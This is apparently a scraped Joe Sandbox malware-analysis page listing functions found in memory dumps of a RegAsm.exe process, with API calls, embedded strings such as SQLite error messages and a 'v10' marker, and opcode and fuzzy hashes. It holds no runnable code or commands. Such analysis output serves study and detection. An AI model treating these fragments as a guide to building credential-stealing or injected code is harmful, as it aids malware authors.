Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 0-3348720253
Opcode ID: f673bcff88febeb10f9b9029c958f284aa002ef35a43d8ac7dfdd261241e2e83
Instruction ID: 7eaa7b76cbb99170da1bb2badb73fc20663eb931e66760124131c452a7d56a5e
Opcode Fuzzy Hash: f673bcff88febeb10f9b9029c958f284aa002ef35a43d8ac7dfdd261241e2e83
Instruction Fuzzy Hash: 7A4129766083019BD704CF24EC80FAAB7E4EF81316F2C456EF555AB2C2D332E5158751

Function 19264C00 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 143COMMON

Download Yara Rule

Strings

temp, xrefs: 19264C3E
invalid arguments to fts4aux constructor, xrefs: 19264C9E
CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN), xrefs: 19264CCB

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN)$invalid arguments to fts4aux constructor$temp
API String ID: 0-537686372
Opcode ID: 73793d87d77e362496bb91af3d526844c2c389bf91f6bbc1a0b3c1263d6a63cf
Instruction ID: 4245da17ba70799a478bef2cd0f162bc78fd990ea9423c2693f78d6daa11469c
Opcode Fuzzy Hash: 73793d87d77e362496bb91af3d526844c2c389bf91f6bbc1a0b3c1263d6a63cf
Instruction Fuzzy Hash: 904139765002429FCB04CF58D980AA67BF2EF45725F2C84ADFCD98B762D632E951CB60

Function 004063B1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004063B6
memcmp.MSVCRT ref: 004063DC
memset.MSVCRT ref: 0040640B
LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Strings

v10, xrefs: 004063D4

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocH_prologLocallstrlenmemcmpmemset
String ID: v10
API String ID: 2733184300-1337588462
Opcode ID: 430379befafe8ab5387d7d8327eb41e253a8c858f5480c1b1877b21b769bbced
Instruction ID: a2b7bcaca1c000452f3b6f2657c80f90a0423dc396e4891538442c5a8cac53a7
Opcode Fuzzy Hash: 430379befafe8ab5387d7d8327eb41e253a8c858f5480c1b1877b21b769bbced
Instruction Fuzzy Hash: A6317E71D00219ABCB10DFA5DC91AEEBB78EF04354F11813FE916B72C0D778AA18CA58

Function 1930EBD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1930EC42
CREATE , xrefs: 1930EBFF
%s at line %d of [%.10s], xrefs: 1930EC51
database corruption, xrefs: 1930EC4C

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$CREATE $database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-1360532505
Opcode ID: b1c420b5a69d33f0b9a8aee40805b2c8fbdc5ec09e14b8b23c5846273b940035
Instruction ID: cea6f967c90cbb54c383bb65efdb9847a3df82553e0530ddb0eb23e8039b041c
Opcode Fuzzy Hash: b1c420b5a69d33f0b9a8aee40805b2c8fbdc5ec09e14b8b23c5846273b940035
Instruction Fuzzy Hash: 30315C7A7083C15AEB318A599C50BA27BD1AF4121AF1C41BEF8C58B282D327A550C771

Function 192E93A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 192E9446, 192E948A
%s at line %d of [%.10s], xrefs: 192E9455, 192E9499
database corruption, xrefs: 192E9450, 192E9494

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 33d13d0b0a2a366bcfdede2187f4283c10d428b1bff96e150dbc7c1e06f8c06f
Instruction ID: e121cc4e2e40d9cf2dfc5d381a9b3b1fa91abb57c6a0c1f37772903f399d8ee0
Opcode Fuzzy Hash: 33d13d0b0a2a366bcfdede2187f4283c10d428b1bff96e150dbc7c1e06f8c06f
Instruction Fuzzy Hash: 49313479700B914BD324DF28C890AB3BBF29F45701B98849DE9D74B786E322E846C750

Function 19274F40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 91COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19274F62, 19274FF3
%s at line %d of [%.10s], xrefs: 19274F71, 19275002
database corruption, xrefs: 19274F6C, 19274FFD

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 7d50204c4493e2f553c4b8835c78bc3b1f7a97b6802f7f30fa9fdd0465fba333
Instruction ID: e68b4c82a090920813b2b8d4ac607643637a26ddb94096703395e76ecc96ceba
Opcode Fuzzy Hash: 7d50204c4493e2f553c4b8835c78bc3b1f7a97b6802f7f30fa9fdd0465fba333
Instruction Fuzzy Hash: 0331497A20464267C311DB29DD40BF5BBE0FF56311F0C42A6F459DB682D325E960D7A1

Function 19241C60 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19241D3C
unknown database: %s, xrefs: 19241CBD
misuse, xrefs: 19241D46
%s at line %d of [%.10s], xrefs: 19241D4B

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
API String ID: 0-142545749
Opcode ID: a6a2d98b687e35e8f506012dc1a92ca87cb76eb5144ad3e40d73983d64fbf226
Instruction ID: 50ed3fa8ce9690a12515dd9777f34f99a2d6de2b9640107047042c8230eaf5ba
Opcode Fuzzy Hash: a6a2d98b687e35e8f506012dc1a92ca87cb76eb5144ad3e40d73983d64fbf226
Instruction Fuzzy Hash: BE2168B5600782ABE7149A25DD80F9737A9AFE2359F3C012CF859572C2D334E5048772

Function 19273FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1927407D, 192740A8
%s at line %d of [%.10s], xrefs: 1927408C, 192740B7
database corruption, xrefs: 19274087, 192740B2

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 7a10f368128fc4035c327ac6bded32a7598aca61e4dafd8d7940f2e44a032547
Instruction ID: a4f7b7c66fed78800416ed444398a9ba247076bd30caae31fe85ff07f24b535a
Opcode Fuzzy Hash: 7a10f368128fc4035c327ac6bded32a7598aca61e4dafd8d7940f2e44a032547
Instruction Fuzzy Hash: EA2103B76013125BD704DE48DC40AFB7BE0EB94A11F8A4066FD89E7341E335DA4987E2

Function 192E9290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 192E929C, 192E932A
%s at line %d of [%.10s], xrefs: 192E92AB, 192E9339
database corruption, xrefs: 192E92A6, 192E9334

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: c5329cc9bf3619cae00cc0b86489c2af5ae4f561a252243ae08c7ea74a2a8498
Instruction ID: e97058c609fa4eca21642f0acfa9cc22fdc83284b2d210d428135c23447bf4a4
Opcode Fuzzy Hash: c5329cc9bf3619cae00cc0b86489c2af5ae4f561a252243ae08c7ea74a2a8498
Instruction Fuzzy Hash: 7021463D204B905BD322DF688DC0AB3BBF19F05310B8D849DE1D787796E222E981C790

Function 0040DEB5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040DECC

Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B

std::_Xinvalid_argument.LIBCPMT ref: 0040DEEE
memcpy.MSVCRT ref: 0040DF2B

Strings

invalid string position, xrefs: 0040DEC7
string too long, xrefs: 0040DEE9

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
String ID: invalid string position$string too long
API String ID: 214693668-4289949731
Opcode ID: de2a1df18cf5d26554ea6783a315de80fe588738b6151625a04740c3031700d1
Instruction ID: 1b7bfbfb966d511aa30ef4aaa2d96a7292c461b53ec02d08ed85f2dd27ac607e
Opcode Fuzzy Hash: de2a1df18cf5d26554ea6783a315de80fe588738b6151625a04740c3031700d1
Instruction Fuzzy Hash: 0C11DD317003059FDB24DE98C981A6AB3E8EB45704B10497EF853EB2C2DB74E9488798

Function 192533C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 192533D6

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
API String ID: 0-1935849370
Opcode ID: ad69de1543cc1b7286acf3b1e62f795680e4e77fc5b932092898e916fa0b0e2b
Instruction ID: 0e0849c3709b05342a4aced993f82526e7f8ae75cbe118eee3900717a7059482
Opcode Fuzzy Hash: ad69de1543cc1b7286acf3b1e62f795680e4e77fc5b932092898e916fa0b0e2b
Instruction Fuzzy Hash: EA0196797042179BD701DF19E8017CAB3D5EFC5311F59C166F5049B240EB70A68787A1

Function 193E5BC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E7D446EE,?,?,00000000,1943D1CB,000000FF,?,193E5B30,?,?,193E5ADF,?), ref: 193E5BF6
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 193E5C08
FreeLibrary.KERNEL32(00000000,?,?,00000000,1943D1CB,000000FF,?,193E5B30,?,?,193E5ADF,?), ref: 193E5C2A

Strings

CorExitProcess, xrefs: 193E5C00
mscoree.dll, xrefs: 193E5BEF

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 99f8e75e11c5ab030eaf8a5002d73d5d97d23ecfedded201ea5191e618f6edac
Instruction ID: 21637ef34bca41ad9b837365317318e6db0c0c654d467c11fabe47027fbb48e8
Opcode Fuzzy Hash: 99f8e75e11c5ab030eaf8a5002d73d5d97d23ecfedded201ea5191e618f6edac
Instruction Fuzzy Hash: 3F0167369145BDAFDF05CFA0CD44BAEB7B8FB04715F440B25E81AA22D0D778D500CA90

Function 0040FC38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042654E), ref: 0040FC46
HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC4D
GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC59
wsprintfA.USER32 ref: 0040FC84

Strings

NeB, xrefs: 0040FC5F, 0040FC63

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID: NeB
API String ID: 1243822799-85837446
Opcode ID: d4aeb748054ef85310db5bbdc432010fa75f15f3d3fe455483fb2aece36d3219
Instruction ID: 6a3b0a9d5a99a23c7b872276523f8019a9300f8a2912452fb95d56cdfabf1196
Opcode Fuzzy Hash: d4aeb748054ef85310db5bbdc432010fa75f15f3d3fe455483fb2aece36d3219
Instruction Fuzzy Hash: F7F0FEAA900124BBDB50ABD99D09ABF76FDEF0DB02F001452FB41E1091E6788950D7B4

Function 19356A20 Relevance: 8.0, APIs: 5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd
